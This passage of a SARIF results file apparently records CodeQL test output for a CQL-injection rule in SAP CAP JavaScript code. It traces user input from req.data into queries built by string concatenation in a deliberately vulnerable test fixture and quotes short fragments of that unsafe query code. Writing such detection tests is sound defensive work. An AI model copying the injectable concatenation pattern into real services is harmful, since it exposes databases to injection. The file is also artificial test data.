id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":646,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":647,"startColumn":18,"endColumn":23}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":645,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":653,"startColumn":18,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"e6651c34faab8e22:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":652,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":653,"startColumn":18,"endColumn":23}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":651,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":659,"startColumn":18,"endColumn":23}}}],"partialFingerprints":{"primaryLocationLineHash":"35109df28cbbc5c:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":54,"endColumn":56}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":48,"endColumn":58}},"message":{"text":"`ID=${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":21,"endColumn":59}},"message":{"text":"SELECT. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":658,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":659,"startColumn":18,"endColumn":23}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":657,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":7,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"efbe9cdee9ed72b8:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":36,"endColumn":47}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":669,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":670,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":7,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"3a884df2f960d319:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":45,"endColumn":47}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":36,"endColumn":47}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":674,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":675,"startColumn":36,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":7,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"693c1ad544283ec3:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":42,"endColumn":44}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":36,"endColumn":46}},"message":{"text":"`ID=${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":679,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":680,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":7,"endColumn":81}}}],"partialFingerprints":{"primaryLocationLineHash":"737ffeac7015e49f:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":78,"endColumn":80}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":66,"endColumn":80}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":704,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":36,"endColumn":58}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":705,"startColumn":66,"endColumn":80}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":7,"endColumn":80}}}],"partialFingerprints":{"primaryLocationLineHash":"68fb2832260c17eb:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":77,"endColumn":79}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":66,"endColumn":79}},"message":{"text":"`col1 =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":709,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":36,"endColumn":58}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":710,"startColumn":66,"endColumn":79}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":7,"endColumn":81}}}],"partialFingerprints":{"primaryLocationLineHash":"c05bb3983bd0ec24:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":76,"endColumn":78}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":66,"endColumn":80}},"message":{"text":"`col1 = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":714,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":36,"endColumn":58}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":715,"startColumn":66,"endColumn":80}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":7,"endColumn":79}}}],"partialFingerprints":{"primaryLocationLineHash":"a5013b756880128f:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":52,"endColumn":58}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":36,"endColumn":58}},"message":{"text":"\"col1 = ...  amount"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided 